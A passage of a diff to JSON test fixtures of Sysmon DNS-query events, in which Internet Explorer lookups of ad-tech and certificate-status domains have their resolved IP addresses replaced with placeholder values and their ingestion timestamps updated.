Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epixel.onaudience.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet 
Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:10.067Z", @@ -19375,12 +19113,12 @@ "type": "CNAME" }, { - "data": "72.21.91.29", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "72.21.91.29" + "89.160.20.156" ] }, "network": { 
@@ -19397,13 +19135,13 @@ "status.geotrust.com" ], "ip": [ - "72.21.91.29" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313975198Z", + "ingested": "2021-12-09T13:49:44.740026200Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067504600Z'/\u003e\u003cEventRecordID\u003e204\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.054\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatus.geotrust.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ocsp.digicert.com;type: 5 cs9.wac.phicdn.net;::ffff:72.21.91.29;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067504600Z'/\u003e\u003cEventRecordID\u003e204\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.054\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatus.geotrust.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ocsp.digicert.com;type: 5 cs9.wac.phicdn.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:10.067Z", @@ -19467,11 +19205,11 @@ "type": "CNAME" }, { - "data": "151.139.128.14", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -19479,7 +19217,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -19487,7 +19225,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -19495,7 +19233,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { 
@@ -19503,21 +19241,21 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" } ], "resolved_ip": [ - "151.139.128.14", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "network": { 
@@ -19533,22 +19271,22 @@ "ocsp.trust-provider.com" ], "ip": [ - "151.139.128.14", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313976506Z", + "ingested": "2021-12-09T13:49:44.740032200Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067529300Z'/\u003e\u003cEventRecordID\u003e205\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.126\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.trust-provider.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 
t3j2g9x7.stackpathcdn.com;::ffff:151.139.128.14;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067529300Z'/\u003e\u003cEventRecordID\u003e205\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.126\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.trust-provider.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 t3j2g9x7.stackpathcdn.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet 
Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:10.067Z", @@ -19619,11 +19357,11 @@ "type": "CNAME" }, { - "data": "151.139.128.14", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -19631,7 +19369,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -19639,7 +19377,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -19647,7 +19385,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -19655,21 +19393,21 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" } ], "resolved_ip": [ - "151.139.128.14", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "network": { 
@@ -19685,22 +19423,22 @@ "ocsp.comodoca4.com" ], "ip": [ - "151.139.128.14", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313977835Z", + "ingested": "2021-12-09T13:49:44.740038100Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067550800Z'/\u003e\u003cEventRecordID\u003e206\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.184\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.comodoca4.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 
t3j2g9x7.stackpathcdn.com;::ffff:151.139.128.14;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067550800Z'/\u003e\u003cEventRecordID\u003e206\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.184\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.comodoca4.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 t3j2g9x7.stackpathcdn.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", 
"provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:10.067Z", @@ -19768,52 +19506,52 @@ "type": "CNAME" }, { - "data": "52.4.111.14", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.205.68.184", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.0.28.154", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.225.82.232", + "data": "89.160.20.156", "type": "A" }, { - "data": "18.213.13.245", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.22.171.66", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.207.199.229", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.72.57.144", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" } ], "resolved_ip": [ - "52.4.111.14", - "52.205.68.184", - "52.0.28.154", - "34.225.82.232", - "18.213.13.245", - "52.22.171.66", - "52.207.199.229", - "52.72.57.144", - "192.5.6.30" + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30" ] }, "network": { 
@@ -19830,21 +19568,14 @@ "sync.crwdcntrl.net" ], "ip": [ - "52.4.111.14", - "52.205.68.184", - "52.0.28.154", - "34.225.82.232", - "18.213.13.245", - "52.22.171.66", - "52.207.199.229", - "52.72.57.144", - "192.5.6.30" + "89.160.20.156", + "192.168.6.30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313979108Z", + "ingested": "2021-12-09T13:49:44.740043900Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067594200Z'/\u003e\u003cEventRecordID\u003e207\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.322\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.crwdcntrl.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 td.crwdcntrl.net;type: 5 nginx-bcp-stackB-428666447.us-east-1.elb.amazonaws.com;::ffff:52.4.111.14;::ffff:52.205.68.184;::ffff:52.0.28.154;::ffff:34.225.82.232;::ffff:18.213.13.245;::ffff:52.22.171.66;::ffff:52.207.199.229;::ffff:52.72.57.144;192.5.6.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files 
(x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067594200Z'/\u003e\u003cEventRecordID\u003e207\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.322\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.crwdcntrl.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 td.crwdcntrl.net;type: 5 nginx-bcp-stackB-428666447.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:10.067Z", 
@@ -19916,11 +19647,11 @@ "type": "CNAME" }, { - "data": "159.127.42.114", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -19928,7 +19659,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -19936,17 +19667,17 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" } ], "resolved_ip": [ - "159.127.42.114", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30" + "192.168.92.30" ] }, "network": { 
@@ -19964,18 +19695,18 @@ "match.sync.ad.cpe.dotomi.com" ], "ip": [ - "159.127.42.114", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30" + "192.168.92.30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313980421Z", + "ingested": "2021-12-09T13:49:44.740049700Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067634800Z'/\u003e\u003cEventRecordID\u003e208\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.730\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ematch.sync.ad.cpe.dotomi.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cpe.us.dotomi.weighted.com.akadns.net;type: 5 cpe.us.iad.dotomi.weighted.com.akadns.net;type: 5 iad04-convex.dotomi.com;::ffff:159.127.42.114;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet 
Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067634800Z'/\u003e\u003cEventRecordID\u003e208\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.730\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ematch.sync.ad.cpe.dotomi.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cpe.us.dotomi.weighted.com.akadns.net;type: 5 cpe.us.iad.dotomi.weighted.com.akadns.net;type: 5 iad04-convex.dotomi.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:10.067Z", 
@@ -20050,12 +19781,12 @@ "type": "CNAME" }, { - "data": "204.154.111.122", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "204.154.111.122" + "89.160.20.156" ] }, "network": { 
@@ -20072,13 +19803,13 @@ "tps10230.doubleverify.com" ], "ip": [ - "204.154.111.122" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313981737Z", + "ingested": "2021-12-09T13:49:44.740055500Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:11.066534000Z'/\u003e\u003cEventRecordID\u003e209\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:10.627\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etps10230.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 nycp-hlb.doubleverify.com;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:204.154.111.122;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
